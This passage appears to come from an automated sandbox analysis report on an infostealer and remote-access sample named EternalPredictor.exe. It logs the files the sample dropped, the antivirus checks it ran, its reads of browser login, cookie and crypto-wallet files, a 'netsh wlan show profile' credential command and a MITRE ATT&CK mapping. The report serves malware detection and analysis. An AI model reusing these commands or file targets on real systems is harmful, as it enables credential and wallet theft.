                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\XClient.exeQueries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\tree.com | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\consent.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C65D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00007FF72C65D010
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C675E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,5_2_00007FF72C675E7C
                        Source: C:\Users\user\Desktop\EternalPredictor.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\Users\user\AppData\Roaming\program.exe | File written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Source: eternal.exe, 00000002.00000002.3240375426.000000001CA00000.00000004.00000020.00020000.00000000.sdmp, eternal.exe, 00000002.00000002.3236463360.000000001BE50000.00000004.00000020.00020000.00000000.sdmp, eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Roaming\eternal.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 00000008.00000003.1934849918.00000237A5ED6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000003.1524758278.00000139887E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000003.1524758278.00000139887E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: program.exe PID: 4464, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: program.exe PID: 2360, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI44642\rarreg.key, type: DROPPED
                        Source: Yara match | File source: 74.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.2.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 54.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 54.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.0.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 74.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000000.1505357195.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000004A.00000002.1701196379.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000036.00000000.1632827829.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: skuld.exe PID: 3872, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 3948, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\skuld.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED
                        Source: Yara match | File source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.EternalPredictor.exe.3d10cf0.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.0.eternal.exe.bc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.EternalPredictor.exe.3d22330.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: EternalPredictor.exe PID: 2852, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: eternal.exe PID: 5604, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\eternal.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\content-prefs.sqlite
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-releaseJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\ls-archive.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\permissions.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\protections.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.defaultJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: Yara match | File source: 74.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.2.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 54.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 54.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.0.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 74.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000000.1505357195.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000004A.00000002.1701196379.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000036.00000000.1632827829.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: skuld.exe PID: 3872, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: program.exe PID: 2360, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 3948, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 7812, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\skuld.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED

                        Remote Access Functionality

                        Source: Yara match | File source: 00000008.00000003.1934849918.00000237A5ED6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000003.1524758278.00000139887E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000003.1524758278.00000139887E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: program.exe PID: 4464, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: program.exe PID: 2360, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI44642\rarreg.key, type: DROPPED
                        Source: Yara match | File source: 74.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.2.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 54.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 54.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.0.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 74.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000000.1505357195.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000004A.00000002.1701196379.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000036.00000000.1632827829.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: skuld.exe PID: 3872, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 3948, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\skuld.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED
                        Source: Yara match | File source: Process Memory Space: program.exe PID: 2360, type: MEMORYSTR
                        Source: Yara match | File source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.EternalPredictor.exe.3d10cf0.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.0.eternal.exe.bc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.EternalPredictor.exe.3d22330.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: EternalPredictor.exe PID: 2852, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: eternal.exe PID: 5604, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\eternal.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBAA4953DC bind, 8_2_00007FFBAA4953DC
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBAA496424 listen, 8_2_00007FFBAA496424
                        MITRE ATT&CK Matrix

                        Techniques are listed per tactic column in the order the matrix shows them; a number in front of a technique is the signature-count badge the matrix attaches to it, kept exactly as shown.

                        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
                        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
                        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
                        Execution: 341 Windows Management Instrumentation; 2 Native API; 122 Command and Scripting Interpreter; 1 Scheduled Task/Job; 3 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
                        Persistence: 1 DLL Side-Loading; 1 Windows Service; 1 Scheduled Task/Job; 121 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                        Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 1 Windows Service; 111 Process Injection; 1 Scheduled Task/Job; 121 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
